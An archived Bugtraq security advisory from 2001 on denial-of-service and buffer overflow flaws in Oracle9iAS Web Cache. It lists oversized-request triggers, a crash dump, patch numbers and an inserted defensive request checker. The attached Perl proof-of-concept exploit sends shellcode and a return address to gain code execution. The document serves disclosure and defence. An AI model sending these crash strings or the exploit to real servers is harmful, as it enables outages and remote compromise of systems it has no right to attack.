[22893] in bugtraq


def-2001-30

daemon@ATHENA.MIT.EDU (andreas junestam)
Thu Oct 18 12:38:46 2001

Message-ID: <3BCEE434.F597D815@defcom.com>
Date: Thu, 18 Oct 2001 16:16:20 +0200
From: andreas junestam <andreas.junestam@defcom.com>
To: bugtraq <bugtraq@securityfocus.com>

======================================================================
                   Defcom Labs Advisory def-2001-30

   Oracle9iAS Web Cache/2.0.0.1.0 Multiple DoS and Buffer Overflow

Authors: George Hedfors <george.hedfors@defcom.com>
         Andreas Junestam <andreas.junestam@defcom.com>
Release Date: 2001-10-18
======================================================================
------------------------=[Brief Description]=-------------------------
Release 2.0.0.1.0, and possibly earlier releases, contains a URL-driven
buffer overrun condition that can cause the process to exit, hang, or
execute injected code.

------------------------=[Affected Systems]=--------------------------
Oracle9iAS Web Cache/2.0.0.1.0 on all supported platforms.

----------------------=[Detailed Description]=------------------------
A simple URL driven denial of service or buffer overflow condition 
occurs when a very long text string is sent to the web service. 
This occurs on all four web services that the Oracle9iAS Web Cache 
software provides. The four services are by default run on:
Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.

* Buffer overflow condition:
  When sending a request containing / + 'A' x 3095 + 'N' x 4, the
  process terminates with the following state dump:

  <....snip>
  State Dump for Thread Id 0x104

  eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
  esi=01baac86 edi=0040deb6
  eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000            
  efl=00000216
  <snip....>


* Denial of service:
  Upon sending a string longer than 3570 characters, the process
  simply exits without a stack dump:
  'GET /<3571 x A> HTTP/1.0'

  The following three denial of service attacks result in the process
  hanging at 100% CPU usage; a reboot is required in order to
  terminate the hung processes.

  - When sending a string containing approximately 3094 characters.

  - When sending approximately 4000 or more characters in an HTTP header.
    User-Agent is one of the verified headers where this condition
    exists.
    'GET / HTTP/1.0'
    'User-Agent: <4000 x A>'

  - Sending the following request (this only affects the webcache
    admin interface):
    'GET /. HTTP/1.0'
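
A defensive check for the request shapes described above, added here as an example and not part of the advisory, of Defcom's tooling or of Oracle's product; the byte thresholds and the port-to-service map are assumptions taken from the advisory's figures with a small safety margin:

```python
import re
from typing import List
# Constructed rule set (not Oracle's or Defcom's code). Thresholds sit a
# little below the advisory's observed values: ~3094-byte targets hang or
# crash the process, 3571+ bytes make it exit, ~4000-byte headers hang it.
TARGET_LIMIT = 3000
HEADER_LIMIT = 3900
WEBCACHE_PORTS = {1100: "proxy", 4000: "admin", 4001: "invalidation", 4002: "stats"}

def check_request(port: int, raw: bytes) -> List[str]:
    """Return findings for one raw HTTP request sent to the given port."""
    findings: List[str] = []
    service = WEBCACHE_PORTS.get(port)
    if service is None:
        return findings  # not a Web Cache listener, nothing to check
    # Accept CRLF or bare LF separators; the advisory's PoC used "\n\n".
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = re.split(rb"\r?\n", head)
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        findings.append(f"{service}: malformed request line")
        return findings
    target = parts[1]
    if len(target) >= TARGET_LIMIT:
        findings.append(f"{service}: request target of {len(target)} bytes "
                        f"exceeds {TARGET_LIMIT}")
    if service == "admin" and target == b"/.":  # admin-only hang trigger
        findings.append("admin: request for '/.' (known hang trigger)")
    for hdr in lines[1:]:
        name, sep, value = hdr.partition(b":")
        if not sep:
            continue  # not a header line
        size = len(value.strip())
        if size >= HEADER_LIMIT:
            findings.append(f"{service}: header {name.decode(errors='replace')} "
                            f"value of {size} bytes exceeds {HEADER_LIMIT}")
    return findings

# Constructed sample traffic mirroring the advisory's cases plus a benign one.
SAMPLES = [
    (1100, b"GET /" + b"A" * 3571 + b" HTTP/1.0\r\n\r\n"),
    (1100, b"GET / HTTP/1.0\r\nUser-Agent: " + b"A" * 4000 + b"\r\n\r\n"),
    (4000, b"GET /. HTTP/1.0\r\n\r\n"),
    (1100, b"GET /index.html HTTP/1.0\r\nHost: cache\r\n\r\n"),
]

def run_samples() -> List[List[str]]:
    return [check_request(port, raw) for port, raw in SAMPLES]
```

The same '/.' request on the proxy port produces no finding, matching the advisory's note that it only affects the admin interface.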

---------------------------=[Workaround]=-----------------------------
Download the patch from Oracle's support website,
http://metalink.oracle.com

NT/WIN2K:
Patch number 2044682

SUN Sparc Solaris:
Patch number 2042106

HP-UX:
Patch number 2043908

Linux:
Patch number 2043924

Compaq Tru64 Unix:
Patch number 2043921

IBM AIX:
Patch number 2043917

-----------------------------=[Exploit]=------------------------------
For NT/WIN2K, see attached file, webcache.pl

-------------------------=[Vendor Response]=--------------------------
The vendor was notified on 2001-09-17. A patch has been released.

======================================================================
            This release was brought to you by Defcom Labs

              labs@defcom.com             labs.defcom.com
======================================================================
Attachment: webcache.pl (application/x-perl)

#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
# 
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address (start of buffer in memory) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box (WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC != 1) {
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
# Request line: the bytes above, "\x90" padding out to 3096 bytes, then the
# return address noted in the header comment, then the HTTP version.
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;